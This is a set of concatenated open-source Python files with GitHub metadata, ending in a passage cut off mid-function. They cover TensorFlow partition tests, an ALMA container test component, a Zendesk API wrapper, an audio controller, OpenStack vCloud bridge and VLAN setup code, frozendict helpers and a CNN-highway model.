data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=3)
partition_vals = sess.run(partitions)
self.assertEqual(3, len(partition_vals))
self.assertAllEqual([[]], partition_vals[0])
self.assertAllEqual([[]], partition_vals[1])
self.assertAllEqual(np.array([], dtype=np.float).reshape(0, 0),
partition_vals[2])
def testEmptyPartitions(self):
data_list = []
indices_list = []
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([], partition_vals[0])
self.assertAllEqual([], partition_vals[1])
@unittest.skip("Fails on windows.")
def testGPUTooManyParts(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all but the first
# num_partitions indices.
if not test.is_gpu_available():
return
data_list = [1, 2, 3, 4, 5, 6]
indices_list = [6, 5, 4, 3, 1, 0]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([6], partition_vals[0])
self.assertAllEqual([5], partition_vals[1])
@unittest.skip("Fails on windows.")
def testGPUPartsTooLarge(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all the values
# larger than num_partitions.
if not test.is_gpu_available():
return
data_list = [1, 2, 3, 4, 5, 6]
indices_list = [10, 11, 2, 12, 0, 1000]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=5)
partition_vals = sess.run(partitions)
self.assertEqual(5, len(partition_vals))
self.assertAllEqual([5], partition_vals[0])
self.assertAllEqual([], partition_vals[1])
self.assertAllEqual([3], partition_vals[2])
self.assertAllEqual([], partition_vals[3])
self.assertAllEqual([], partition_vals[4])
@unittest.skip("Fails on windows.")
def testGPUAllIndicesBig(self):
# This test only makes sense on the GPU. There we do not check
# for errors. In this case, we should discard all the values
# and have an empty output.
if not test.is_gpu_available():
return
data_list = [1.1, 2.1, 3.1, 4.1, 5.1, 6.1]
indices_list = [90, 70, 60, 100, 110, 40]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=40)
partition_vals = sess.run(partitions)
self.assertEqual(40, len(partition_vals))
for i in range(40):
self.assertAllEqual([], partition_vals[i])
def testErrorIndexOutOfRange(self):
with self.cached_session() as sess:
data = constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11],
[12, 13, 14]])
indices = constant_op.constant([0, 2, 99, 2, 2])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
with self.assertRaisesOpError(r"partitions\[2\] = 99 is not in \[0, 4\)"):
sess.run(partitions)
def testScalarIndexOutOfRange(self):
with self.cached_session() as sess:
bad = 17
data = np.zeros(5)
partitions = data_flow_ops.dynamic_partition(data, bad, num_partitions=7)
with self.assertRaisesOpError(r"partitions = 17 is not in \[0, 7\)"):
sess.run(partitions)
def testHigherRankIndexOutOfRange(self):
with self.cached_session() as sess:
shape = (2, 3)
indices = array_ops.placeholder(shape=shape, dtype=np.int32)
data = np.zeros(shape + (5,))
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=7)
for i in xrange(2):
for j in xrange(3):
bad = np.zeros(shape, dtype=np.int32)
bad[i, j] = 17
with self.assertRaisesOpError(
r"partitions\[%d,%d\] = 17 is not in \[0, 7\)" % (i, j)):
sess.run(partitions, feed_dict={indices: bad})
def testErrorWrongDimsIndices(self):
data = constant_op.constant([[0], [1], [2]])
indices = constant_op.constant([[0], [0]])
with self.assertRaises(ValueError):
data_flow_ops.dynamic_partition(data, indices, num_partitions=4)
# see https://github.com/tensorflow/tensorflow/issues/17106
def testCUBBug(self):
x = constant_op.constant(np.random.randn(3072))
inds = [0]*189 + [1]*184 + [2]*184 + [3]*191 + [4]*192 + [5]*195 + [6]*195
inds += [7]*195 + [8]*188 + [9]*195 + [10]*188 + [11]*202 + [12]*194
inds += [13]*194 + [14]*194 + [15]*192
self.assertEqual(len(inds), x.shape[0])
partitioned = data_flow_ops.dynamic_partition(x, inds, 16)
with self.cached_session() as sess:
res = sess.run(partitioned)
self.assertEqual(res[-1].shape[0], 192)
if __name__ == "__main__":
test.main()
| {
"content_hash": "43f91d579663cdd7347f54b692717048",
"timestamp": "",
"source": "github",
"line_count": 329,
"max_line_length": 80,
"avg_line_length": 42.2370820668693,
"alnum_prop": 0.6389608520437536,
"repo_name": "alshedivat/tensorflow",
"id": "07da855a0174d7b217ac383758e358922b7e18e4",
"size": "14585",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/dynamic_partition_op_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "3325"
},
{
"name": "Batchfile",
"bytes": "10132"
},
{
"name": "C",
"bytes": "439824"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "50398044"
},
{
"name": "CMake",
"bytes": "199209"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1276639"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "871083"
},
{
"name": "Jupyter Notebook",
"bytes": "2604347"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "61311"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "40038696"
},
{
"name": "RobotFramework",
"bytes": "890"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "486609"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import acspytest__POA
from Acspy.Servants.ContainerServices import ContainerServices
from Acspy.Servants.ComponentLifecycle import ComponentLifecycle
from Acspy.Servants.ACSComponent import ACSComponent
from CORBA import TRUE, FALSE
#*******************************************************************************
# ALMA - Atacama Large Millimiter Array
# (c) Associated Universities Inc., 2002
# (c) European Southern Observatory, 2002
# Copyright by ESO (in the framework of the ALMA collaboration)
# and Cosylab 2002, All rights reserved
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA
#
#------------------------------------------------------------------------------
'''
Module designed to test the full functionality of the Python Container. Since
Python is not a compiled language, its vital that everything be tested.
'''
#------------------------------------------------------------------------------
class PyTestNestedModule(acspytest__POA.nested.PyTestNestedModule,
ACSComponent, #Base IDL interface
ContainerServices, #Developer niceties
ComponentLifecycle): #HLA stuff
def __init__(self):
ACSComponent.__init__(self)
ContainerServices.__init__(self)
return
'''
Component designed to test the functionality of the Python container.
'''
def test(self):
'''
Python implementation of IDL method.
'''
print "Testing method from component in a nested module."
return
#------------------------------------------------------------------------------
if __name__ == "__main__":
print "Creating an object"
g = PyTestNestedModule()
g.test()
print "Done..."
| {
"content_hash": "a92e2b0e315d10f3e8e8dbe07668d28e",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 80,
"avg_line_length": 40.59322033898305,
"alnum_prop": 0.6200417536534447,
"repo_name": "csrg-utfsm/acscb",
"id": "2956456da2de05b0ab6807c66dbe72e5493cd2fc",
"size": "2395",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acspy/test/acspytestImpl/PyTestNestedModule.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListRecent(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListRecent Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListRecent, self).__init__(temboo_session, '/Library/Zendesk/Tickets/ListRecent')
def new_input_set(self):
return ListRecentInputSet()
def _make_result_set(self, result, path):
return ListRecentResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListRecentChoreographyExecution(session, exec_id, path)
class ListRecentInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListRecent
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_Email(self, value):
"""
Set the value of the Email input for this Choreo. ((required, string) The email address you use to login to your Zendesk account.)
"""
super(ListRecentInputSet, self)._set_input('Email', value)
def set_Page(self, value):
"""
Set the value of the Page input for this Choreo. ((optional, integer) The page number of the results to be returned. Used together with the PerPage parameter to paginate a large set of results.)
"""
super(ListRecentInputSet, self)._set_input('Page', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((required, password) Your Zendesk password.)
"""
super(ListRecentInputSet, self)._set_input('Password', value)
def set_PerPage(self, value):
"""
Set the value of the PerPage input for this Choreo. ((optional, integer) The number of results to return per page. Maximum is 100 and default is 100.)
"""
super(ListRecentInputSet, self)._set_input('PerPage', value)
def set_Server(self, value):
"""
Set the value of the Server input for this Choreo. ((required, string) Your Zendesk domain and subdomain (e.g., temboocare.zendesk.com).)
"""
super(ListRecentInputSet, self)._set_input('Server', value)
class ListRecentResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListRecent Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Zendesk.)
"""
return self._output.get('Response', None)
def get_NextPage(self):
"""
Retrieve the value for the "NextPage" output from this Choreo execution. ((integer) The index for the next page of results.)
"""
return self._output.get('NextPage', None)
def get_PreviousPage(self):
"""
Retrieve the value for the "PreviousPage" output from this Choreo execution. ((integer) The index for the previous page of results.)
"""
return self._output.get('PreviousPage', None)
class ListRecentChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListRecentResultSet(response, path)
| {
"content_hash": "790a0a839a1a7b7c98df05b85508fddb",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 202,
"avg_line_length": 42.151162790697676,
"alnum_prop": 0.6772413793103448,
"repo_name": "jordanemedlock/psychtruths",
"id": "a88f5b00dde9bba13ad84aec34cf4a52b71e4789",
"size": "4480",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/Library/Zendesk/Tickets/ListRecent.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
"""Tests for identity_function."""
from absl.testing import absltest
from pydemos.mock_test import identity_function
class IdentityFunctionTest(absltest.TestCase):
def test_identity_function(self):
self.assertEqual(1, identity_function.identity_function(1))
if __name__ == '__main__':
absltest.main()
| {
"content_hash": "ac3bb423fe20230f5b9353c72718f9d9",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 63,
"avg_line_length": 24.153846153846153,
"alnum_prop": 0.7420382165605095,
"repo_name": "google-research/pydemos",
"id": "5cf9cd47445ff8645749df703b9c594809ddd25f",
"size": "899",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pydemos/mock_test/identity_function_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1927"
},
{
"name": "HTML",
"bytes": "3795"
},
{
"name": "JavaScript",
"bytes": "2408"
},
{
"name": "Python",
"bytes": "111079"
},
{
"name": "Shell",
"bytes": "180"
},
{
"name": "Svelte",
"bytes": "4126"
},
{
"name": "TypeScript",
"bytes": "20257"
}
],
"symlink_target": ""
} |
"""Hardware interfaces for sound output"""
# Authors: Dan McCloy <drmccloy@uw.edu>
# Eric Larson <larsoner@uw.edu>
#
# License: BSD (3-clause)
import numpy as np
from scipy import fftpack
import sys
import os
import pyglet
_use_silent = (os.getenv('_EXPYFUN_SILENT', '') == 'true')
_opts_dict = dict(linux2=('pulse',),
win32=('directsound',),
darwin=('openal',))
_opts_dict['linux'] = _opts_dict['linux2'] # new name on Py3k
_driver = _opts_dict[sys.platform] if not _use_silent else ('silent',)
pyglet.options['audio'] = _driver
# these must follow the above option setting, so PEP8 complains
from pyglet.media import Player, AudioFormat, SourceGroup # noqa
try:
from pyglet.media import StaticMemorySource
except ImportError:
from pyglet.media.sources.base import StaticMemorySource # noqa
from ._utils import logger, flush_logger # noqa
def _check_pyglet_audio():
if pyglet.media.get_audio_driver() is None:
raise SystemError('pyglet audio ("%s") could not be initialized'
% pyglet.options['audio'][0])
class SoundPlayer(Player):
def __init__(self, data, fs, loop=False):
assert AudioFormat is not None
super(SoundPlayer, self).__init__()
_check_pyglet_audio()
sms = _as_static(data, fs)
group = SourceGroup(sms.audio_format, None)
group.loop = bool(loop)
group.queue(sms)
self.queue(group)
def stop(self):
self.pause()
self.seek(0.)
class PygletSoundController(object):
"""Use pyglet audio capabilities"""
def __init__(self, ec, stim_fs):
logger.info('Expyfun: Setting up Pyglet audio')
assert AudioFormat is not None
self.fs = stim_fs
# Need to generate at RMS=1 to match TDT circuit
noise = np.random.normal(0, 1.0, int(self.fs * 15.)) # 15 secs
# Low-pass if necessary
if stim_fs < self.fs:
# note we can use cheap DFT method here b/c
# circular convolution won't matter for AWGN (yay!)
freqs = fftpack.fftfreq(len(noise), 1. / self.fs)
noise = fftpack.fft(noise)
noise[np.abs(freqs) > stim_fs / 2.] = 0.0
noise = np.real(fftpack.ifft(noise))
# ensure true RMS of 1.0 (DFT method also lowers RMS, compensate here)
noise = noise / np.sqrt(np.mean(noise * noise))
self.noise_array = np.array((noise, -1.0 * noise))
self.noise = SoundPlayer(self.noise_array, self.fs, loop=True)
self._noise_playing = False
self.audio = SoundPlayer(np.zeros((2, 1)), self.fs)
self.ec = ec
flush_logger()
def start_noise(self):
if not self._noise_playing:
self.noise.play()
self._noise_playing = True
def stop_noise(self):
if self._noise_playing:
self.noise.stop()
self._noise_playing = False
def clear_buffer(self):
self.audio.delete()
self.audio = SoundPlayer(np.zeros((2, 1)), self.fs)
def load_buffer(self, samples):
self.audio.delete()
self.audio = SoundPlayer(samples.T, self.fs)
def play(self):
self.audio.play()
self.ec._stamp_ttl_triggers([1])
def stop(self):
self.audio.stop()
def set_noise_level(self, level):
new_noise = SoundPlayer(self.noise_array * level, self.fs, loop=True)
if self._noise_playing:
self.stop_noise()
self.noise.delete()
self.noise = new_noise
self.start_noise()
else:
self.noise = new_noise
def halt(self):
self.stop()
self.stop_noise()
# cleanup pyglet instances
self.audio.delete()
self.noise.delete()
def _as_static(data, fs):
"""Helper to get data into the Pyglet audio format"""
fs = int(fs)
if data.ndim not in (1, 2):
raise ValueError('Data must have one or two dimensions')
n_ch = data.shape[0] if data.ndim == 2 else 1
audio_format = AudioFormat(channels=n_ch, sample_size=16,
sample_rate=fs)
data = data.T.ravel('C')
data[data < -1] = -1
data[data > 1] = 1
data = (data * (2 ** 15)).astype('int16').tostring()
return StaticMemorySourceFixed(data, audio_format)
class StaticMemorySourceFixed(StaticMemorySource):
"""Stupid class to fix old Pyglet bug"""
def _get_queue_source(self):
return self
| {
"content_hash": "f12b4d14b59803f5f352d5de2bc3d484",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 78,
"avg_line_length": 31.291666666666668,
"alnum_prop": 0.596537949400799,
"repo_name": "lkishline/expyfun",
"id": "50a22872fef9554d01c585591ce8c376e01b6dc0",
"size": "4506",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "expyfun/_sound_controllers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1018"
},
{
"name": "PowerShell",
"bytes": "2988"
},
{
"name": "Python",
"bytes": "390894"
}
],
"symlink_target": ""
} |
"""
A network utils module to use vcloudapi
"""
import re
import contextlib
from oslo.config import cfg
from oslo.vmware import api
from oslo.vmware import vim
import suds
from nova import exception
from nova import utils
from nova.i18n import _, _LI, _LW
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova.virt import driver
from nova.virt.vcloudapi import vcenter_utils
from nova.virt.vcloudapi import network_utils
from nova.network import linux_net
from nova.network import model as network_model
LOG = logging.getLogger(__name__)
def create_org_vdc_network(session, org_vdc_name, vif):
"""use the vif to create_org_vdc_network
now we just use the vif id to create a port, so we
can find it's properties like vlanid in vcenter
"""
create_orgvdcnetwork_with_name(session, org_vdc_name, vif['id'])
# return the network name we just use
return vif['id']
def create_orgvdcnetwork_with_name(session, org_vdc_name, network_name):
gateway_name = ''
start_address = '192.168.0.1'
end_address = '192.168.0.253'
gateway_ip = '192.168.0.254'
netmask = '255.255.255.0'
result, task = session._call_method(session.vca,
"create_isolated_vdc_network",
org_vdc_name, network_name,
gateway_name, start_address,
end_address, gateway_ip,
netmask)
# check the task is success or not
if not result:
raise exception.NovaException(
"Create_org_network error, task:" +
task)
session._wait_for_task(task)
def delete_org_vdc_network(session, org_vdc_name, vif):
"""use the vif to create_org_vdc_network
now we just use the vif id to create a port, so we
can find it's properties like vlanid in vcenter
"""
delete_orgvdcnetwork_with_name(session, org_vdc_name, vif['id'])
# return the network name we just delete
return vif['id']
def delete_orgvdcnetwork_with_name(session, org_vdc_name, network_name):
"""delete the org vdc network with given name """
result, task = session._call_method(session.vca, "delete_isolated_vdc_network",
org_vdc_name, network_name)
# check the task is success or not
if not result:
raise exception.NovaException(
"Delete_org_network error, task:" +
task)
session._wait_for_task(task)
def plug_vif(vcenter_api, instance, vif, ovsport_info):
"""link the pg which name contains the network_name to the
compute node bridge"""
vlan_id, dvs_name = vcenter_api.get_dvs_and_vlanid_with_pgname_alias(
vif['id'][:network_model.NIC_NAME_LEN])
# TODO(nkapotoxin) check the dvs_name is correct or not?
plug_ovs_hybrid(instance, vif, ovsport_info, vlan_id)
def plug_ovs_hybrid(instance, vif, ovsport_info, vlan_id):
"""Plug using hybrid strategy
Create a per-VIF linux bridge, then link that bridge to the OVS
integration bridge via a veth device, setting up the other end
of the veth device just like a normal OVS port. Then boot the
VIF on the linux bridge using standard libvirt mechanisms.
"""
iface_id = get_ovs_interfaceid(vif)
br_name = get_br_name(vif['id'])
v1_name, v2_name = get_veth_pair_names(vif['id'])
gbr_name = get_gbr_name(vif['id'])
tap_name, taq_name = get_gveth_pair_names(vif['id'])
ovs_nicport = ovsport_info['ovs_ethport']
vlan_tag = str(vlan_id)
nic_name = ovs_nicport + '.' + vlan_tag
# add the first gbr to connect to the origin qbr
if not linux_net.device_exists(gbr_name):
utils.execute('brctl', 'addbr', gbr_name, run_as_root=True)
utils.execute('brctl', 'setfd', gbr_name, 0, run_as_root=True)
utils.execute('brctl', 'stp', gbr_name, 'off', run_as_root=True)
utils.execute('tee',
('/sys/class/net/%s/bridge/multicast_snooping' %
gbr_name),
process_input='0',
run_as_root=True,
check_exit_code=[0, 1])
if linux_net.device_exists(nic_name):
# try to delete the exists nic_name in whatever br
utils.execute('vconfig', 'rem', nic_name, run_as_root=True)
if not linux_net.device_exists(tap_name):
linux_net._create_veth_pair(tap_name, taq_name)
utils.execute(
'ip',
'link',
'set',
gbr_name,
'up',
run_as_root=True)
utils.execute(
'brctl',
'addif',
gbr_name,
taq_name,
run_as_root=True)
# add the second qbr to connect to the origin ovs br-int
if not linux_net.device_exists(br_name):
utils.execute('brctl', 'addbr', br_name, run_as_root=True)
utils.execute('brctl', 'setfd', br_name, 0, run_as_root=True)
utils.execute('brctl', 'stp', br_name, 'off', run_as_root=True)
utils.execute('tee',
('/sys/class/net/%s/bridge/multicast_snooping' %
br_name),
process_input='0',
run_as_root=True,
check_exit_code=[0, 1])
utils.execute(
'brctl',
'addif',
br_name,
tap_name,
run_as_root=True)
if not linux_net.device_exists(v2_name):
linux_net._create_veth_pair(v1_name, v2_name)
utils.execute('ip', 'link', 'set', br_name, 'up', run_as_root=True)
utils.execute('brctl', 'addif', br_name, v1_name, run_as_root=True)
linux_net.create_ovs_vif_port(get_bridge_name(vif),
v2_name, iface_id, vif['address'],
instance['uuid'])
# connect qbrxxxx to nic
if not linux_net.device_exists(nic_name):
try:
# ifup ovs_ethport
utils.execute('ifconfig', ovs_nicport, 'up', run_as_root=True)
# add brif
utils.execute('vconfig', 'add', ovs_nicport, vlan_tag,
run_as_root=True)
# up the if
utils.execute('ifconfig', nic_name, 'up', run_as_root=True)
connect_nic_to_br(instance, gbr_name, nic_name)
except Exception as exc:
LOG.exception(exc, instance=instance)
LOG.debug(
'Connect nic to br finished, vir:%s',
vif,
instance=instance)
def get_ovs_interfaceid(vif):
return vif.get('ovs_interfaceid') or vif['id']
def get_br_name(iface_id):
return ("qbr" + iface_id)[:network_model.NIC_NAME_LEN]
def get_gbr_name(iface_id):
"""generate the security supported br"""
return ("qgr" + iface_id)[:network_model.NIC_NAME_LEN]
def get_gveth_pair_names(iface_id):
"""generate the security supported pair veth"""
return (("tap%s" % iface_id)[:network_model.NIC_NAME_LEN],
("taq%s" % iface_id)[:network_model.NIC_NAME_LEN])
def get_veth_pair_names(iface_id):
return (("qvb%s" % iface_id)[:network_model.NIC_NAME_LEN],
("qvo%s" % iface_id)[:network_model.NIC_NAME_LEN])
def connect_nic_to_br(instance, br_name, nic_name):
utils.execute('brctl', 'addif', br_name, nic_name, run_as_root=True)
def get_bridge_name(vif):
return vif['network']['bridge']
def unplug_vif(vcenter_api, instance, vif, ovsport_info):
"""link the pg which name contains the network_name to the
compute node bridge"""
vlan_id, dvs_name = vcenter_api.get_dvs_and_vlanid_with_pgname_alias(
vif['id'][:network_model.NIC_NAME_LEN])
# TODO check the dvs_name is correct or not?
if vlan_id is not None:
unplug_ovs(instance, vif, ovsport_info, vlan_id)
def unplug_ovs(instance, vif, ovsport_info,
vlan_id):
unplug_ovs_hybrid(
instance,
vif,
ovsport_info,
vlan_id)
def unplug_ovs_hybrid(
instance, vif, ovsport_info, vlan_id):
"""UnPlug using hybrid strategy
Unhook port from OVS, unhook port from bridge, delete
bridge, and delete both veth devices.
"""
# now dirver use the configed nic eth0.100 instead
ovs_nicport = ovsport_info['ovs_ethport']
vlan_tag = str(vlan_id)
nic_name = ovs_nicport + '.' + vlan_tag
# remove the eth1 vlan config
try:
# try to delete the exists nic_name in whatever br
utils.execute('vconfig', 'rem', nic_name, run_as_root=True)
except Exception as exc:
LOG.exception(exc, instance=instance)
try:
br_name = get_br_name(vif['id'])
v1_name, v2_name = get_veth_pair_names(vif['id'])
gbr_name = get_gbr_name(vif['id'])
tap_name, taq_name = get_gveth_pair_names(vif['id'])
if linux_net.device_exists(br_name):
utils.execute('brctl', 'delif', br_name, v1_name,
run_as_root=True)
utils.execute('brctl', 'delif', br_name, tap_name,
run_as_root=True)
utils.execute('ip', 'link', 'set', br_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', br_name,
run_as_root=True)
linux_net.delete_ovs_vif_port(get_bridge_name(vif),
v2_name)
if linux_net.device_exists(gbr_name):
utils.execute('brctl', 'delif', gbr_name, taq_name,
run_as_root=True)
utils.execute('ip', 'link', 'set', gbr_name, 'down',
run_as_root=True)
utils.execute('brctl', 'delbr', gbr_name,
run_as_root=True)
# delete veth peer
linux_net.delete_net_dev(v1_name)
linux_net.delete_net_dev(v2_name)
linux_net.delete_net_dev(tap_name)
linux_net.delete_net_dev(taq_name)
except Exception as exc:
LOG.exception(exc, instance=instance)
def unplug_ovs_bridge(instance, vif):
"""No manual unplugging required."""
pass
| {
"content_hash": "07741df89229aa2d09be1979ac6eab8f",
"timestamp": "",
"source": "github",
"line_count": 311,
"max_line_length": 83,
"avg_line_length": 33.19614147909968,
"alnum_prop": 0.5814606741573034,
"repo_name": "Hybrid-Cloud/badam",
"id": "775a30358b68d58bc6bdea1ebb30db39f15214a1",
"size": "10937",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hybrid_cloud_patches/python/nova/virt/vcloudapi/vcloud_network_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "3817"
},
{
"name": "Python",
"bytes": "29372474"
},
{
"name": "Shell",
"bytes": "17334"
}
],
"symlink_target": ""
} |
from frozendict import frozendict
def freeze(o):
t = type(o)
if t is dict:
return frozendict({k: freeze(v) for k, v in o.items()})
if t is frozendict:
return o
if t is str or t is unicode:
return o
try:
return tuple([freeze(i) for i in o])
except TypeError:
pass
return o
def unfreeze(o):
t = type(o)
if t is dict or t is frozendict:
return dict({k: unfreeze(v) for k, v in o.items()})
if t is str or t is unicode:
return o
try:
return [unfreeze(i) for i in o]
except TypeError:
pass
return o
| {
"content_hash": "da7fdb0c59dedf29c81bbbba07bdd9ef",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 63,
"avg_line_length": 17.444444444444443,
"alnum_prop": 0.554140127388535,
"repo_name": "iot-factory/synapse",
"id": "9e10d37aec4bb78496442347d5a2feb983cc886e",
"size": "1237",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "synapse/util/frozenutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2000"
},
{
"name": "HTML",
"bytes": "2905"
},
{
"name": "JavaScript",
"bytes": "176441"
},
{
"name": "Perl",
"bytes": "31842"
},
{
"name": "Python",
"bytes": "1879672"
},
{
"name": "Shell",
"bytes": "4548"
}
],
"symlink_target": ""
} |
import tensorflow as tf
import numpy as np
from neuralnet.highway import highway
class single_cnn_highway(object):
def __init__(self, sequence_length, num_classes, vocab_size, embedding_size, filter_sizes, num_filters, l2_reg_lambda = 0.0, label_smoothing = 0.0, dropout_keep_prob = 0.5):
# Placeholders for input, output and dropout
self.input_x = tf.placeholder(tf.int32, [None, sequence_length], name = "input_x")
self.input_y = tf.placeholder(tf.int32, [None, num_classes], name = "input_y")
self.seq_len = tf.placeholder(tf.int32, [None], name = "seq_len")
self.batch_size = tf.placeholder(tf.int32, name = "batch_size")
self.dropout_keep_prob = tf.placeholder(tf.float32, name = "dropout_keep_prob")
self.label_smoothing = label_smoothing
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0)
# Embedding layer
with tf.device('/cpu:0'), tf.name_scope("embedding"), tf.variable_scope("CNN") as scope:
self.embedded_W = tf.Variable(
tf.random_uniform([vocab_size, embedding_size], dtype=tf.float32, minval=-1.0, maxval=1.0),
name="W")
self.embedded_chars = tf.nn.embedding_lookup(self.embedded_W, self.input_x)
split_chars = tf.split(1, sequence_length, self.embedded_chars)
#print(tf.shape(split_chars[0]))
split_chars_highway = []
#scope.reuse_variables()
for idx in range(sequence_length):
if idx != 0:
scope.reuse_variables()
tmp = highway(tf.reshape(split_chars[idx], [-1, embedding_size]), embedding_size, layer_size = 2)
split_chars_highway.append(tf.expand_dims(tmp, 0))
split_chars_highway = tf.concat(0, split_chars_highway)
split_chars_highway = tf.transpose(split_chars_highway, [1, 0, 2])
self.embedded_chars_expanded = tf.expand_dims(split_chars_highway, -1)
#self.embedded_chars_expanded = tf.expand_dims(self.embedded_chars, -1)
# Create a convolution + maxpool layer for each filter size
pooled_outputs = []
for i, filter_size in enumerate(filter_sizes):
with tf.name_scope("conv-maxpool-%s" % filter_size):
# Convolution Layer
filter_shape = [filter_size, embedding_size, 1, num_filters]
